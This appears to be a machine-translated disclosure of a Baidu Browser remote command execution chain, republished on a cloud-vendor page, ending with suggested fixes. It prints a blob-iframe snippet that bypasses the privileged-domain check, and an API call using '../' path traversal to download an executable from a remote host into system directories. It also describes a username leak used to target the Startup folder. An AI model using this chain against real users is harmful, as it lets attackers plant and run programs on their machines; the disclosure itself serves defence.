Baidu Browser Remote Command Execution 2-bypassing privileged domain restrictions and Solutions

Source: Internet
Author: User

Baidu Browser Remote Command Execution 2-bypassing privileged domain restrictions and Solutions

Three vulnerabilities are used in total:

1. Bypass privileged domain judgment

2. Use the defect API to download any program to a specified directory

3. Download the program to the user startup directory based on the computer user name leakage Defect

1. there is a problem with privileged domain restrictions, Baidu browser in addition to allowing bdbrowser: // and http://xapp.baidu.com/these two outer, I found that file domain can also execute privileged API, when we redirect from the http domain to the bdbrowser or file domain, we will be prompted to prohibit access to resources in the local region, which reminds me of another thing that is a bit local blob. Therefore, the console tests the following code:


Var data = '<script> execute privileged command </script>'; var blob = new Blob ([data], {"type": "text/html "}); (function () {var iframe = document. createElement ("iframe"); iframe. src = URL. createObjectURL (blob); document. body. appendChild (iframe );})()




The code can be successfully executed, so that we can execute the privileged API on any page.







2. The name parameter of the privileged API bdbrowser. skin. download is not filtered. As a result, skin files can be downloaded to any specified directory on the system disk.

 

window.external.StartRequest(1,"bdbrowser.skin.download","(function(id,res){console.log(res)})","{\"name\":\"1/../../../../../../../../../../../../../cmd.exe\",\"url\":\"http://192.168.1.105/testbaidu.exe\"}",window,"")




For example, if the above code is used, a cmd.exe will be generated in the system root directory, as shown in:


 





3. to execute the command, you also need to write the program to the "Start" directory of the system.



However, you need to know the user name in the startup directory path. After research, we found that:



AppService. appMarket. downloadPack and AppService. appMarket. the two APIs of DeleteExt can cause user name leakage. If you do not use the techniques used in the previous vulnerability, the former will pop up the installation prompt, while the latter will not prompt, however, the latter requires that you have installed a plug-in.



 





4. Based on the above three steps, we can build the following PoC code for your reference only. We tested it in WIN7 and IE.


<Html> 



After the final execution, the effect is shown in:


 


 

Solution:

1. Fixed privileged domain judgment

2. Strictly filter the parameters of the privileged API bdbrowser. skin. download to restrict the download path and download source.

3. The sensitive path information in the returned data of AppService. AppMarket. DownloadPack and AppService. AppMarket. DeleteExt is blocked. If the data is not required, you can choose not to return the path information.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.